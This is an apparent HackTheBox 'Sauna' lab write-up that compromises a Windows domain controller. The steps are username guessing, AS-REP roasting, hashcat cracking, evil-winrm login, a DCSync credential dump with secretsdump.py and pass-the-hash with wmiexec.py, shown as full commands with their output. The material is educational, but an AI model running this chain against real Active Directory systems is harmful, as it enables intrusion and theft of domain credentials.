HackTheBox - Sauna

5 minute read

Sauna was a fun 20 point box created by egotisticalSW. It started out with some username enumeration which allows you to AS-REP roast and dump a hash, you then crack it and login via WinRM to get user. You then stumble across some autologon credentials which have DCSync privileges which then allows you to use secretsdump.py, login with the admin hash, and get root.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.175

PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack
80/tcp    open  http             syn-ack
88/tcp    open  kerberos-sec     syn-ack
135/tcp   open  msrpc            syn-ack
139/tcp   open  netbios-ssn      syn-ack
389/tcp   open  ldap             syn-ack
445/tcp   open  microsoft-ds     syn-ack
464/tcp   open  kpasswd5         syn-ack
593/tcp   open  http-rpc-epmap   syn-ack
636/tcp   open  ldapssl          syn-ack
3268/tcp  open  globalcatLDAP    syn-ack
3269/tcp  open  globalcatLDAPssl syn-ack
5985/tcp  open  wsman            syn-ack
9389/tcp  open  adws             syn-ack
49667/tcp open  unknown          syn-ack
49673/tcp open  unknown          syn-ack
49674/tcp open  unknown          syn-ack
49675/tcp open  unknown          syn-ack
49686/tcp open  unknown          syn-ack
52304/tcp open  unknown          syn-ack

Focusing on the more important ports we get the following information:

# nmap -sV -sC -T4 10.10.10.175 -p 80,389,445

80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 
445/tcp open  microsoft-ds?
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m40s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-17T20:57:06
|_  start_date: N/A


SMB


SMB was found to be inaccessible and anonymous RPC access disabled so I moved on from here and checked out the web application running on port 80.


HTTP


Navigating to http://10.10.10.175/ you’re greeted with the following page:


Browsing the site the about us page caught my eye as it contained a handful of employee names and potential usernames we can leverage in our enumeration.


I saved the usernames to a file, shown below:

# cat users 
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb


AD Naming Conventions


I attempted to enumerate users/brute force based on the first and last names disclosed on the site and common password combinations, this was unsuccessful. I came across an article on active directory naming conventions for username creation based on a first and last name.

Based on this article I created a simple Python script to print out combinations of the names as described in the article.

import sys
  
with open(sys.argv[1]) as f1:
    data=iter(f1.read().split())

while True:
    try:
        fn = next(data) # first name
        ln = next(data) # last name
        print(fn+ln)
        print(fn[0]+ln)
        print(fn[:3]+ln[:3])
    except StopIteration:
        break

Running the script spits out a wordlist we can use to enumerate services based upon the different active directory naming conventions. Worth noting I didn’t implement the last convention - 3 random letters and 3 random numbers - I thought that it would be too complex for a 20 point box.

# python3 adnames.py users 
FergusSmith
FSmith
FerSmi
ShaunCoins
SCoins
ShaCoi
HugoBear
HBear
HugBea
BowieTaylor
BTaylor
BowTay
SophieDriver
SDriver
SopDri
StevenKerb
SKerb
SteKer

Saving these to a file, we now have a list of potential usernames to enumerate services.


Kerberos


I used the GetNPUsers.py script from Impacket to AS-REP roast using the newly created username list, the fsmith user succeeds and we manage to dump the hash:

# python3 GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users -dc-ip 10.10.10.175 -request
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:a75c84cbc4b3e326eb1bac9a2c4b3a83$da2ffe6ac2c581b4a1478313886f63e5a29b23c89ee3faf3f40731d02b1a425ff52ee38985d744390d031d4aa142cc2321b4117c30e598fb7e8197764dfe3edd5f480717ea966ca8c9b0dcc6c7e93d17dcfa0eb9d56cd15f8ed6ab89dacbbf0ec4622f60243d313a167cf98782e00a43ce61f4268bdd2479959dd43a1809c4b78a014d613034df9dc2fb62aaceb67ec7e1f8027e6949dd41ed4e0e960b78b34397b55c789ebbca3540d7bb80a4e611872a168b68fe452a7b0a30dcfc246354407228f3d5b508df8ed433a44f25d52078f978c99fc155dd93d5627493374422b47253e29b5acdeb99a43e12f42d4e80fdbac783cef747c5f59a39dadaacad8492 
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Throwing the hash into hashcat with rockyou.txt and we get a result fairly quickly:

# hashcat -a 0 -m 18200 hash /root/rockyou.txt 

Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:a75c84cbc4b3e326eb1bac9a2c4b3a83$da2ffe6ac2c581b4a1478313886f63e5a29b23c89ee3faf3f40731d02b1a425ff52ee38985d744390d031d4aa142cc2321b4117c30e598fb7e8197764dfe3edd5f480717ea966ca8c9b0dcc6c7e93d17dcfa0eb9d56cd15f8ed6ab89dacbbf0ec4622f60243d313a167cf98782e00a43ce61f4268bdd2479959dd43a1809c4b78a014d613034df9dc2fb62aaceb67ec7e1f8027e6949dd41ed4e0e960b78b34397b55c789ebbca3540d7bb80a4e611872a168b68fe452a7b0a30dcfc246354407228f3d5b508df8ed433a44f25d52078f978c99fc155dd93d5627493374422b47253e29b5acdeb99a43e12f42d4e80fdbac783cef747c5f59a39dadaacad8492:Thestrokes23 

The credentials are fsmith / Thestrokes23.


Flag


We can simply login with evil-winrm and type the user flag:

# evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

*Evil-WinRM* PS C:\Users\FSmith> type desktop/user.txt
1b5520...



Root.txt

Enumeration


During enumeration I decided to run winPEAS.exe from the privilege escalation awesome scripts suite. The tool discovered some autologon credentials for the svc_loanmanager account displayed below:

  [+] Looking for AutoLogon credentials(T1012)                                             
    Some AutoLogon credentials were found!!                                                         
    DefaultDomainName             :  EGOTISTICALBANK                                       
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager                       
    DefaultPassword               :  Moneymakestheworldgoround!


BloodHound


The svc_loanmanager credentials fail when attempting to login via SMB and WinRM, I decided to upload and run a SharpHound ingestor as the fsmith user to see what privileges the svc_loanmanager account had (the credentials didn’t work because I overlooked the account name :| - no big deal as BloodHound gives you the correct username).

*Evil-WinRM* PS C:\Users\FSmith\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-BloodHound
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir

    Directory: C:\Users\FSmith\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/17/2020   3:33 PM           9110 20200717153342_BloodHound.zip
-a----        7/17/2020   3:31 PM         973397 SharpHound.ps1
-a----        7/17/2020   3:01 PM         244224 winPEAS.exe
-a----        7/17/2020   3:33 PM          11122 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin

I downloaded the 20200717153342_BloodHound.zip file to Kali and dropped it into in BloodHound. As you can see below svc_loanmgr has the GetChanges and GetChangesAll permissions:


The below permissions can be abused to sync credentials from a DC as described here:

The “DS-Replication-Get-Changes” extended right
    CN: DS-Replication-Get-Changes
    GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
The “Replicating Directory Changes All” extended right
    CN: DS-Replication-Get-Changes-All
    GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
The “Replicating Directory Changes In Filtered Set” extended right (not always needed)
    CN: DS-Replication-Get-Changes-In-Filtered-Set
    GUID: 89e95b76-444d-4c62-991a-0facbeda640c

Since svc_loanmgr has the GetChanges and GetChangesAll permissions we can simply run secretsdump.py and dump the admin hash.


secretsdump.py


Running the script with the following parameters outputs the admin hash:

# python3 secretsdump.py -just-dc-ntlm EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password: Moneymakestheworldgoround!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:a7689cc5799cdee8ace0c7c880b1efe3:::
[*] Cleaning up... 


Flag


With the hash we can simply login and type the root flag:

# python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175 
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>cd users\administrator
C:\users\administrator>type desktop\root.txt
f3ee04...